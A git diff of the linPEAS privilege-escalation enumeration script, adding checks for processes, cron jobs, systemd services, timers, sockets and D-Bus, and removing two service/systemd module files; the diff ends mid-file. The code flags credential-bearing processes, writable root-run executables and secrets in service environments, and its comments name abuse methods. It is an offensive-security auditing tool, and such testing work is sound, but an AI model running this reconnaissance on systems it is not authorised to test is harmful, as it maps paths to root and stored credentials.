+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+    binW="IniTialiZZinnggg"
+    ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
+      if [ -w "$bpath" ]; then
+        binW="$binW|$bpath"
+      fi
+    done
+    ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
+  fi
+  echo ""
+fi
+
+CURRENT_USER_PIVOT_PID=""
+if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
+  #-- PCS) Process opened by other users
+  print_2title "Processes whose PPID belongs to a different user (not root)"
+  print_info "You will know if a user can somehow spawn processes as a different user"
+  
+  # Function to get user by PID
+  get_user_by_pid() {
+    ps -p "$1" -o user | grep -v "USER"
+  }
+
+  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
+  ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
+    if [ "$ppid" = "0" ]; then
+      continue
+    fi
+    ppid_user=$(get_user_by_pid "$ppid")
+    if echo "$user" | grep -Eqv "$ppid_user|root$"; then
+      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+      if [ "$ppid_user" = "$USER" ]; then
+        CURRENT_USER_PIVOT_PID="$ppid"
+      fi
+    fi
+  done
+  echo ""
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Files opened by processes belonging to other users
+  if ! [ "$IAMROOT" ]; then
+    print_2title "Files opened by processes belonging to other users"
+    print_info "This is usually empty because of the lack of privileges to read other user processes information"
+    lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+    echo ""
+  fi
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Processes with credentials inside memory
+  print_2title "Processes with credentials in memory (root req)"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
+  if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
+  if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
+  if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
+  if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
+  if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
+  if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
+  echo ""
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Different processes 1 min
+  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
+    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
+    temp_file=$(mktemp)
+    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
+      for i in $(seq 1 1210); do 
+        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
+      done;
+      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
+      rm "$temp_file";
+    fi
+    echo ""
+  fi
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Cron
+  print_2title "Cron jobs"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+  command -v crontab 2>/dev/null || echo_not_found "crontab"
+  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
+  incrontab -l 2>/dev/null
+  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
+  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
+  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
+  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
+  atq 2>/dev/null
+else
+  print_2title "Cron jobs"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
+fi
+echo ""
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ "$MACPEAS" ]; then
+    print_2title "Third party LaunchAgents & LaunchDemons"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
+    ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
+    echo ""
+
+    print_2title "Writable System LaunchAgents & LaunchDemons"
+    find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
+      program=""
+      program=$(defaults read "$f" Program 2>/dev/null)
+      if ! [ "$program" ]; then
+        program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
+      fi
+      if [ -w "$program" ]; then
+        echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
+      fi
+    done
+    echo ""
+
+    print_2title "StartupItems"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
+    ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
+    echo ""
+
+    print_2title "Login Items"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
+    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
+    echo ""
+
+    print_2title "SPStartupItemDataType"
+    system_profiler SPStartupItemDataType
+    echo ""
+
+    print_2title "Emond scripts"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
+    ls -l /private/var/db/emondClients
+    echo ""
+  fi
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PCS) Services
+  if [ "$EXTRA_CHECKS" ]; then
+    print_2title "Services"
+    print_info "Search for outdated versions"
+    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
+    echo ""
+  fi
+fi
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PSC) systemd PATH
+  print_2title "Systemd PATH"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
+  systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
+  WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
+  echo ""
+fi
+
+#-- PSC) .service files
+#TODO: .service files in MACOS are folders
+print_2title "Analyzing .service files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
+printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
+  if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+      echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
+    fi
+    servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
+    printf "%s\n" "$servicebinpaths" | while read sp; do
+      if [ -w "$sp" ]; then
+        echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
+      fi
+    done
+    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
+    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
+    if [ "$relpath1" ] || [ "$relpath2" ]; then
+      if [ "$WRITABLESYSTEMDPATH" ]; then
+        echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
+      else
+        echo "$s could be executing some relative path"
+      fi
+    fi
+  fi
+done
+if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
+echo ""
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  #-- PSC) Timers
+  print_2title "System timers"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+  (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
+  echo ""
+fi
+
+#-- PSC) .timer files
+print_2title "Analyzing .timer files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
+  if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+    echo "$t" | sed -${E} "s,.*,${SED_RED},g"
+  fi
+  timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
+  printf "%s\n" "$timerbinpaths" | while read tb; do
+    if [ -w "$tb" ]; then
+      echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
+    fi
+  done
+  #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
+  #for rp in "$relpath"; do
+  #  echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
+  #done
+done
+echo ""
+
+#-- PSC) .socket files
+#TODO: .socket files in MACOS are folders
+if ! [ "$IAMROOT" ]; then
+  print_2title "Analyzing .socket files"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+  printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+      echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
+    fi
+    socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketsbinpaths" | while read sb; do
+      if [ -w "$sb" ]; then
+        echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
+      fi
+    done
+    socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketslistpaths" | while read sl; do
+      if [ -w "$sl" ]; then
+        echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
+      fi
+    done
+  done
+  echo ""
+  
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    print_2title "Unix Sockets Listening"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+    # Search sockets using netstat and ss
+    unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
+    if ! [ "$unix_scks_list" ];then
+      unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
+    fi
+    if ! [ "$unix_scks_list" ];then
+      unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
+    fi
+     unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") 
+  fi
+  
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    # But also search socket files
+    unix_scks_list2=$(find / -type s 2>/dev/null)
+  else
+    unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
+  fi
+
+  # Detele repeated dockets and check permissions
+  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
+    perms=""
+    if [ -r "$l" ]; then
+      perms="Read "
+    fi
+    if [ -w "$l" ];then
+      perms="${perms}Write"
+    fi
+    
+    if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
+      CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
+      if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
+        perms="${perms} - Can Connect"
+      else
+        perms="${perms} - Cannot Connect"
+      fi
+    fi
+    
+    if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
+    else 
+      echo "$l" | sed -${E} "s,$l,${SED_RED},g"
+      echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
+      # Try to contact the socket
+      socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
+      if [ $? -eq 0 ]; then
+        owner=$(ls -l "$s" | cut -d ' ' -f 3)
+        echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+        echo "$socketcurl" | head -n 30
+      fi
+    fi
+  done
+  echo ""
+fi
+
+#-- PSC) Writable and weak policies in D-Bus config files
+print_2title "D-Bus config files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+if [ "$PSTORAGE_DBUS" ]; then
+  printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
+    for f in $d/*; do
+      if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+        echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
+      fi
+
+      genpol=$(grep "<policy>" "$f" 2>/dev/null)
+      if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
+
+      userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #for g in `groups`; do
+      #  if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
+      #done
+      grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+
+      #TODO: identify allows in context="default"
+    done
+  done
+fi
+echo ""
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "D-Bus Service Objects list"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+  dbuslist=$(busctl list 2>/dev/null)
+  if [ "$dbuslist" ]; then
+    busctl list | while read line; do
+      echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
+      if ! echo "$line" | grep -qE "$dbuslistG"; then
+        srvc_object=$(echo $line | cut -d " " -f1)
+        srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
+        if [ "$srvc_object_info" ]; then
+          echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
+        fi
+      fi
+    done
+  else echo_not_found "busctl"
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_Services.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_Services.sh
@ -1,193 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Services and Service Files
-# ID: PR_Services
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Services and service files analysis with privilege escalation vectors
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: echo_not_found, print_2title, print_info, print_3title
-# Global Variables: $EXTRA_CHECKS, $SEARCH_IN_FOLDER, $IAMROOT, $WRITABLESYSTEMDPATH
-# Initial Functions:
-# Generated Global Variables: $service_unit, $service_path, $service_content, $finding, $findings, $service_file, $exec_path, $exec_paths, $service, $line, $target_file, $target_exec, $relpath1, $relpath2
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Services and Service Files"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services"
-
-  # Function to check service content for privilege escalation vectors
-  check_service_content() {
-    local service="$1"
-    local findings=""
-    
-    # Check if service runs with elevated privileges
-    if systemctl show "$service" -p User 2>/dev/null | grep -q "root"; then
-      findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
-    fi
-
-    # Get the executable path and check it
-    local exec_path=$(systemctl show "$service" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
-    if [ -n "$exec_path" ]; then
-      if [ -w "$exec_path" ]; then
-        findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
-      fi
-      # Check for relative paths
-      #case "$exec_path" in
-      #  /*) : ;; # Absolute path, do nothing
-      #  *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
-      #esac
-      # Check for weak permissions
-      if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
-        findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
-      fi
-    fi
-
-    # Check for unsafe configurations
-    if systemctl show "$service" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
-      findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
-    fi
-
-    # Check for environment variables with sensitive data
-    if systemctl show "$service" -p Environment 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
-      findings="${findings}SENSITIVE_ENV: Contains sensitive environment variables\n"
-    fi
-
-    # Check for capabilities
-    if systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH)'; then
-      findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
-    fi
-
-    # If any findings, print them
-    if [ -n "$findings" ]; then
-      echo "  Potential issue in service: $service"
-      echo "$findings" | while read -r finding; do
-        [ -n "$finding" ] && echo "  └─ $finding"
-      done
-    fi
-  }
-
-  # Function to check service file for privilege escalation vectors
-  check_service_file() {
-    local service_file="$1"
-    local findings=""
-
-    # Check if service file is writable (following symlinks)
-    if [ -L "$service_file" ]; then
-      # If it's a symlink, check the target file
-      local target_file=$(readlink -f "$service_file")
-      if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-        findings="${findings}WRITABLE_FILE: Service target file is writable: $target_file\n"
-      fi
-    elif ! [ "$IAMROOT" ] && [ -w "$service_file" ] && [ -f "$service_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-      findings="${findings}WRITABLE_FILE: Service file is writable\n"
-    fi
-
-    # Check for weak permissions (following symlinks)
-    if [ "$(stat -L -c %a "$service_file" 2>/dev/null)" = "777" ]; then
-      findings="${findings}WEAK_PERMS: Service file has 777 permissions\n"
-    fi
-
-    # Check for relative paths in Exec directives - Original logic
-    local relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$service_file" 2>/dev/null | grep -Iv "=/")
-    local relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$service_file" 2>/dev/null)
-    if [ "$relpath1" ] || [ "$relpath2" ]; then
-      if [ "$WRITABLESYSTEMDPATH" ]; then
-        findings="${findings}RELATIVE_PATH: Could be executing some relative path (systemd path is writable)\n"
-      else
-        findings="${findings}RELATIVE_PATH: Could be executing some relative path\n"
-      fi
-    fi
-
-    # Check for writable executables (following symlinks)
-    local exec_paths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$service_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
-    printf "%s\n" "$exec_paths" | while read -r exec_path; do
-      if [ -n "$exec_path" ]; then
-        if [ -L "$exec_path" ]; then
-          local target_exec=$(readlink -f "$exec_path")
-          if [ -w "$target_exec" ]; then
-            findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
-          fi
-        elif [ -w "$exec_path" ]; then
-          findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
-        fi
-      fi
-    done
-
-    # If any findings, print them
-    if [ -n "$findings" ]; then
-      echo "  Potential issue in service file: $service_file"
-      echo "$findings" | while read -r finding; do
-        [ -n "$finding" ] && echo "  └─ $finding"
-      done
-    fi
-  }
-
-  # List all services and check for privilege escalation vectors
-  echo ""
-  print_3title "Active services:"
-  systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do
-    service_unit=$(echo "$line" | awk '{print $1}')
-    if [ -n "$service_unit" ]; then
-      # Print the service line with highlighting
-      echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
-
-      # Get service file path
-      service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
-      if [ -n "$service_path" ]; then
-        check_service_file "$service_path"
-      fi
-
-      # Check service content for privilege escalation vectors
-      check_service_content "$service_unit"
-    fi
-  done || echo_not_found
-
-  # Check for disabled but available services
-  echo ""
-  print_3title "Disabled services:"
-  systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
-    service_unit=$(echo "$line" | awk '{print $1}')
-    if [ -n "$service_unit" ]; then
-      # Print the service line with highlighting
-      echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
-
-      # Get service file path
-      service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
-      if [ -n "$service_path" ]; then
-        check_service_file "$service_path"
-      fi
-
-      # Check service content for privilege escalation vectors
-      check_service_content "$service_unit"
-    fi
-  done || echo_not_found
-
-  # Check service files from PSTORAGE_SYSTEMD
-  if [ -n "$PSTORAGE_SYSTEMD" ]; then
-    echo ""
-    print_3title "Additional service files:"
-    printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do
-      if [ -n "$service_file" ] && [ -e "$service_file" ]; then
-        check_service_file "$service_file"
-      fi
-    done
-  fi
-
-  # Check for outdated services if EXTRA_CHECKS is enabled
-  if [ "$EXTRA_CHECKS" ]; then
-    echo ""
-    print_3title "Service versions and status:"
-    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
-  fi
-
-  # Check systemd path writability
-  if [ ! "$WRITABLESYSTEMDPATH" ]; then 
-    echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"
-  else
-    echo "You can write on systemd PATH" | sed -${E} "s,.*,${SED_RED},"
-    echo "If a relative path is used, it's possible to abuse it."
-  fi
-
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Systemd.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Systemd.sh
@ -1,156 +0,0 @@
-# Title: System Information - Systemd
-# ID: SY_Systemd
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Check for systemd vulnerabilities and misconfigurations that could lead to privilege escalation:
-#   - Systemd version vulnerabilities (CVE-2021-4034, CVE-2021-33910, etc.)
-#   - Services running as root that could be exploited
-#   - Services with dangerous capabilities that could be abused
-#   - Services with writable paths that could be used to inject malicious code
-#   - Exploitation methods:
-#     * Version exploits: Use known exploits for vulnerable systemd versions
-#     * Root services: Abuse services running as root to execute commands
-#     * Capabilities: Abuse services with dangerous capabilities (CAP_SYS_ADMIN, etc.)
-#     * Writable paths: Replace executables in writable paths to get code execution
-# License: GNU GPL
-# Version: 1.1
-# Functions Used: print_2title, print_list, echo_not_found
-# Global Variables: $SEARCH_IN_FOLDER, $Wfolders, $SED_RED, $SED_RED_YELLOW, $NC
-# Initial Functions:
-# Generated Global Variables: $WRITABLESYSTEMDPATH, $line, $service, $file, $version, $user, $caps, $path, $path_line, $service_file, $exec_line, $cmd
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-    print_2title "Systemd Information"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
-
-    # Function to check if systemctl is available
-    check_systemctl() {
-        if ! command -v systemctl >/dev/null 2>&1; then
-            echo_not_found "systemctl"
-            return 1
-        fi
-        return 0
-    }
-
-    # Function to get service file path
-    get_service_file() {
-        local service="$1"
-        local file=""
-        for path in "/etc/systemd/system/$service" "/lib/systemd/system/$service"; do
-            if [ -f "$path" ]; then
-                file="$path"
-                break
-            fi
-        done
-        echo "$file"
-    }
-
-    # Function to check dangerous capabilities
-    check_dangerous_caps() {
-        local caps="$1"
-        echo "$caps" | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_SETUID|CAP_SETGID|CAP_NET_ADMIN)'
-        return $?
-    }
-
-    # Check systemd version and known vulnerabilities
-    print_list "Systemd version and vulnerabilities? .............. "$NC
-    if check_systemctl; then
